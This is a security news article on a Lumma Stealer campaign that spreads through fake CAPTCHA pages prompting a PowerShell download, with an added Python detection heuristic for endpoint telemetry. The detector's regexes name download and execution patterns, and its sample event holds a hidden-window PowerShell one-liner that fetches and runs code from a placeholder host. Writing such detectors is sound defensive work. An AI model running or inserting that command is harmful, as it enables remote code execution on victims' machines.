Lumma Stealer stars in a brand new campaign that uses malicious CAPTCHA pages to trick targets into clicking through the "verification" process, triggering the initial malware download.
Malware-as-a-service (MaaS) Lumma Stealer is commonly used by threat actors to steal sensitive information such as passwords and crypto-wallet data, explained researchers at Qualys, who recently detailed the latest attack chain.
"When the user clicks the 'I am not a robot' button, verification steps are presented," Qualys threat researcher Vishwajeet Kumar wrote in a blog post detailing the latest Lumma Stealer find. "Completing these steps triggers the execution of a PowerShell command that initiates the download of an initial stager (malware downloader) on the target machine."
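As an added example (not code from Qualys or the article), the following Python heuristic scores constructed process-creation events for the chain described above: a user-driven PowerShell launch whose command line fetches and runs remote content, which is what a pasted "verification" command looks like in endpoint telemetry. The Sysmon-style field names, the parent-process list, the threshold and the sample events are all assumptions.

```python
"""Score process-creation events for the fake-CAPTCHA -> PowerShell stager pattern."""
import re

# Cmdlets/aliases that fetch remote content (assumed list, extend per environment).
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|net\.webclient)", re.I)
# Ways of executing whatever was fetched.
EXEC_RE = re.compile(r"(\biex\b|invoke-expression|\.invoke\(|&\s*\()", re.I)
# Flags that hide the window or bypass policy, common in pasted one-liners.
HIDE_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc(odedcommand)?\b|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)
# Parents that indicate a human launched the shell (Run box or browser), not a scheduled job.
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(ev):
    """Return (score, reasons) for one Sysmon-style process-creation event (assumed fields)."""
    reasons = []
    if _basename(ev.get("Image", "")) not in SHELLS:
        return 0, reasons
    cmd = ev.get("CommandLine", "")
    parent = _basename(ev.get("ParentImage", ""))
    if parent in USER_PARENTS:
        reasons.append("parent %s (user-driven launch)" % parent)
    if DOWNLOAD_RE.search(cmd):
        reasons.append("remote download in command line")
    if EXEC_RE.search(cmd):
        reasons.append("executes fetched content")
    if HIDE_RE.search(cmd):
        reasons.append("hidden-window / policy-bypass flags")
    return len(reasons), reasons

def alert(ev, threshold=3):
    """True when enough indicators co-occur; a lone download cmdlet alone is too noisy."""
    return score_event(ev)[0] >= threshold

# Constructed sample events, not real telemetry. The first mimics a pasted stager
# command with a placeholder URL; the second is a routine admin script launch.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://placeholder.invalid/stage1)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(alert(ev), score_event(ev)[1])
```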
Lumma Stealer's Easy Adaptability
This latest CAPTCHA-based tactic is new, Kumar added in the Lumma Stealer campaign analysis. Earlier campaigns have relied on a wide array of cybercrimes to spread the infostealer, ranging from basic phishing to far more exotic gambits.
Just a handful of examples from this year alone include a Lumma Stealer campaign from January 2024 that used YouTube channels disguised as content offering workarounds for evading Web filters and cracking popular applications.
By the summer, another Lumma Stealer effort popped up on Facebook, this time trying to lure victims into downloading a legitimate artificial intelligence (AI) photo editor. Even Hamster Kombat wasn't spared. The more than 250 million estimated players of the game were targeted and lured into downloading Lumma Stealer by several simultaneous scams, it was discovered last July.
"The investigation into Lumma Stealer reveals an evolving threat landscape characterized by the malware's ability to adapt and evade detection," Kumar wrote. "It employs a variety of tactics, from leveraging legitimate software to using deceptive delivery methods, making it a persistent challenge for security teams."
Defending against ongoing Lumma Stealer threats requires close collaboration between threat intelligence, security operations centers (SOCs), and incident-response teams, according to Sarah Jones, a cyber-threat intelligence research analyst at Critical Start.
"Given the rapid evolution of threats like Lumma Stealer, security teams must adopt a stance of continuous monitoring and adaptation, regularly updating detection rules, indicators of compromise, and security controls," Jones says. "This campaign exemplifies the sophisticated threats organizations face today, requiring a multilayered defense approach that combines advanced technical controls with proactive threat hunting and ongoing adaptation to effectively combat evolving malware campaigns."